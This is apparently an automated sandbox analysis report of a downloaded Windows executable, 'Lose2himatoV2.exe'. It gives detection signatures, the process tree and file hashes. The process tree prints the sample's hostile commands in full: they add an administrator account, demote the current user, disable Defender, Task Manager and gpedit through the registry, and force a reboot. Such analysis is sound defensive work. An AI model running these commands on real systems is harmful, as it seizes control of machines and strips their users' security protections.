Analysis

  • max time kernel
    160s
  • max time network
    161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2024 22:17

Errors

Reason
Machine shutdown

General

  • Target

    https://gofile.io/d/QzrdeO

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Detected potential entity reuse from brand PAYPAL.
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/QzrdeO
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff240946f8,0x7fff24094708,0x7fff24094718
      2⤵
        PID:1540
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
        2⤵
          PID:1272
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2852
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
          2⤵
            PID:1452
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
            2⤵
              PID:872
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
              2⤵
                PID:3152
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1
                2⤵
                  PID:1648
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
                  2⤵
                    PID:552
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
                    2⤵
                      PID:2772
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1904
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
                      2⤵
                        PID:3000
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
                        2⤵
                          PID:4892
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
                          2⤵
                            PID:3676
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
                            2⤵
                              PID:4904
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6080 /prefetch:8
                              2⤵
                                PID:1464
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6380 /prefetch:8
                                2⤵
                                  PID:2140
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
                                  2⤵
                                    PID:3104
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
                                    2⤵
                                      PID:3300
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4528
                                    • C:\Users\Admin\Downloads\Lose2himatoV2.exe
                                      "C:\Users\Admin\Downloads\Lose2himatoV2.exe"
                                      2⤵
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Sets desktop wallpaper using registry
                                      • System Location Discovery: System Language Discovery
                                      PID:1880
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c net user Lose2himato /add
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2200
                                        • C:\Windows\SysWOW64\net.exe
                                          net user Lose2himato /add
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3412
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 user Lose2himato /add
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1768
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1120
                                        • C:\Windows\SysWOW64\net.exe
                                          net user Lose2himato dumbass
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3996
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 user Lose2himato dumbass
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:956
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1280
                                        • C:\Windows\SysWOW64\net.exe
                                          net localgroup Administrators "Lose2himato" /add
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5196
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5232
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
                                        3⤵
                                        • Indicator Removal: Network Share Connection Removal
                                        • System Location Discovery: System Language Discovery
                                        PID:4068
                                        • C:\Windows\SysWOW64\net.exe
                                          net localgroup Administrators "Admin" /delete
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5204
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5240
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4784
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5296
                                      • C:\Windows\SysWOW64\explorer.exe
                                        "explorer.exe"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Modifies registry class
                                        PID:1464
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5692
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5784
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5724
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5812
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5804
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5924
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5844
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5916
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:6008
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
                                          4⤵
                                            PID:1684
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff240946f8,0x7fff24094708,0x7fff24094718
                                              5⤵
                                                PID:4528
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:6040
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck
                                              4⤵
                                                PID:2416
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff240946f8,0x7fff24094708,0x7fff24094718
                                                  5⤵
                                                    PID:4424
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato666
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:6080
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato666
                                                  4⤵
                                                    PID:4216
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf8,0x124,0x7fff240946f8,0x7fff24094708,0x7fff24094718
                                                      5⤵
                                                        PID:4144
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c shutdown /r
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5544
                                                    • C:\Windows\SysWOW64\shutdown.exe
                                                      shutdown /r
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5788
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
                                                  2⤵
                                                    PID:5224
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1956 /prefetch:1
                                                    2⤵
                                                      PID:1216
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
                                                      2⤵
                                                        PID:2464
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6880 /prefetch:1
                                                        2⤵
                                                          PID:3268
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                                                          2⤵
                                                            PID:5588
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
                                                            2⤵
                                                              PID:5668
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5720 /prefetch:8
                                                              2⤵
                                                                PID:5028
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6888 /prefetch:8
                                                                2⤵
                                                                • Modifies registry class
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:1392
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1
                                                                2⤵
                                                                  PID:3416
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
                                                                  2⤵
                                                                    PID:5796
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5504 /prefetch:2
                                                                    2⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:5312
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,4149867348627137199,14157829665011445952,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                                                                    2⤵
                                                                      PID:3660
                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                    1⤵
                                                                      PID:1240
                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                      1⤵
                                                                        PID:4164
                                                                      • C:\Windows\system32\LogonUI.exe
                                                                        "LogonUI.exe" /flags:0x4 /state0:0xa3908855 /state1:0x41c64e6d
                                                                        1⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:3756

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        dc058ebc0f8181946a312f0be99ed79c

                                                                        SHA1

                                                                        0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

                                                                        SHA256

                                                                        378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

                                                                        SHA512

                                                                        36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                        Filesize

                                                                        152B

                                                                        MD5

                                                                        a0486d6f8406d852dd805b66ff467692

                                                                        SHA1

                                                                        77ba1f63142e86b21c951b808f4bc5d8ed89b571

                                                                        SHA256

                                                                        c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

                                                                        SHA512

                                                                        065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

